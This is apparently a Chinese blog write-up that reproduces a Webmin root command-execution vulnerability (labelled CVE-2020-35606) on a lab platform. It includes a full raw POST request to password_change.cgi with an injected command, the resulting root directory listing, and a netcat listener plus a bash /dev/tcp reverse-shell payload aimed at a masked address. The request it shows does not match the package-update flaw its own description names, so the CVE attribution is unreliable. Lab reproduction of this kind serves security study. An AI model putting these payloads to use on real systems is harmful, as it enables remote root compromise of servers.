CVE-2020-35606 Webmin命令执行复现

漏洞详情:

该模块利用 Webmin 1.962 及更低版本中的任意命令执行漏洞。 任何授权“包更新”模块的用户都可以使用 root 权限执行任意命令。 它是通过规避针对 CVE-2019-12840 采取的措施而出现的。 s/\(-)|\(.)/string/g; 逃避不足以预防。 因此,由于包名变量直接放置在系统命令中,我们可以使用一些 HTTP 支持的转义字符对其进行操作。 例如,我们可以通过将命令行下一行来逃避控制。 我们可以使用 "%0A" 和 "%0C" urlencoded 行值来做到这一点。此外,为了使 paylad 正常工作,我们必须在有效负载的末尾添加双符号 (&&) (%26%26)

复现过程:

通过http://vulfocus.fofa.so/完成实验

访问地址:https://vulfocus.fofa.so:48998/

 

POST请求

  • POST /password_change.cgi HTTP/1.1

Host: vulfocus.fofa.so:48998

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 55

Origin: https://vulfocus.fofa.so:48998

Connection: close

Referer: https://vulfocus.fofa.so:48998/

Cookie: redirect=1; testing=1

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

 

user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22

响应:

<center><h3>Failed to change password : The current password is incorrectCHANGELOG              config.info.ru.UTF-8      module.info.es.UTF-8

acl-lib.pl        config.info.ru_RU   module.info.fr

acl_security.pl        config.info.ru_RU.UTF-8  module.info.fr.UTF-8

backup_config.pl   config.info.ru_SU   module.info.hu

cert_form.cgi         config.info.sk                module.info.hu.UTF-8

cert_issue.cgi         config.info.sk.UTF-8      module.info.it

cert_output.cgi             config.info.sv                module.info.it.UTF-8

cgi_args.pl            config.info.sv.UTF-8      module.info.ja_JP.UTF-8

config                   config.info.tr          module.info.ja_JP.euc

config-ALL-linux   config.info.uk_UA   module.info.ko_KR.UTF-8

config-freebsd             config.info.uk_UA.UTF-8  module.info.ko_KR.euc

config-macos       config.info.zh_CN         module.info.ms_MY

config-netbsd              config.info.zh_CN.UTF-8  module.info.ms_MY.UTF-8

config-openbsd           config.info.zh_TW.Big5   module.info.nl

config-solaris-10-ALL  config.info.zh_TW.UTF-8  module.info.nl.UTF-8

config-syno-linux convert.cgi            module.info.no

config.info            convert_form.cgi   module.info.no.UTF-8

config.info.ar         defaultacl              module.info.pl

config.info.bg        delete_group.cgi    module.info.pl.UTF-8

config.info.bg.UTF-8     delete_groups.cgi         module.info.pt

config.info.ca        delete_session.cgi         module.info.pt.UTF-8

config.info.ca.UTF-8     delete_user.cgi      module.info.pt_BR

config.info.cz         delete_users.cgi     module.info.pt_BR.UTF-8

config.info.cz.UTF-8      edit_acl.cgi            module.info.ru.UTF-8

config.info.da        edit_group.cgi              module.info.ru_RU

config.info.da.UTF-8     edit_pass.cgi          module.info.ru_RU.UTF-8

config.info.de        edit_rbac.cgi          module.info.ru_SU

config.info.de.UTF-8     edit_sql.cgi            module.info.sk

config.info.es        edit_sync.cgi          module.info.sk.UTF-8

config.info.es.UTF-8     edit_unix.cgi          module.info.sv

config.info.eu        edit_user.cgi          module.info.sv.UTF-8

config.info.eu.UTF-8     feedback_files.pl    module.info.tr

config.info.fa         help                      module.info.zh_CN

config.info.fr         images                  module.info.zh_TW.Big5

config.info.fr.UTF-8      index.cgi               negativeacl

config.info.hr        lang                      openssl.cnf

config.info.hu        list_sessions.cgi     postinstall.pl

config.info.hu.UTF-8     log_parser.pl         save_acl.cgi

config.info.it          makedn.cgi           save_group.cgi

config.info.it.UTF-8       maketables.cgi             save_pass.cgi

config.info.ja_JP.UTF-8  md5-lib.pl            save_sql.cgi

config.info.ja_JP.euc     module.info          save_sync.cgi

config.info.ko_KR.UTF-8  module.info.ar           save_twofactor.cgi

config.info.ko_KR.euc   module.info.bg             save_unix.cgi

config.info.ms_MY module.info.bg.UTF-8   save_user.cgi

config.info.ms_MY.UTF-8  module.info.ca                schema.cgi

config.info.nl         module.info.ca.UTF-8   switch.cgi

config.info.nl.UTF-8      module.info.cz              system_info.pl

config.info.no        module.info.cz.UTF-8    twofactor.pl

config.info.no.UTF-8     module.info.da             twofactor_form.cgi

config.info.pl         module.info.da.UTF-8   useradmin_update.pl

config.info.pl.UTF-8      module.info.de             webmin.schema

config.info.pt_BR   module.info.de.UTF-8

config.info.pt_BR.UTF-8  module.info.es

</h3></center>

<hr>

</div>

<div data-autocomplete="1" class="-shell-port-">

  <div class="-shell-port-container">

    <div data-shell-config><i aria-label="Configuration" class="fa fa-lg fa-cogs"></i></div>

    <div aria-label="Close" class="-shell-port-close"></div>

    <div data-output="true"><pre data-xconsole></pre></div>

    <div class="-shell-port-cmd">

      <span class="-shell-port-prompt"><span class="-shell-port-type">[@<span data-shell-host="2469abb357a9">2469abb357a9</span> <span class="-shell-port-pwd" data-home="/root" data-pwd="/root">~</span>]#</span></span><input type="text" data-command="true" autocomplete="off" spellcheck="false"><span class="-shell-port-cursor">&nbsp;</span>

    </div>

  </div>

</div>

<div class="top-aprogress"></div>

</body>

</html>

 

反弹

远程服务器:

Nc -vvlp 8888

 

 

 test|bash -c "bash -i >%26 /dev/tcp/xxx.xxx.xxx.xxx/8888 0>%261"

 

 

 

 

posted @ 2021-11-30 09:12  低调的思考  阅读(1086)  评论(0编辑  收藏  举报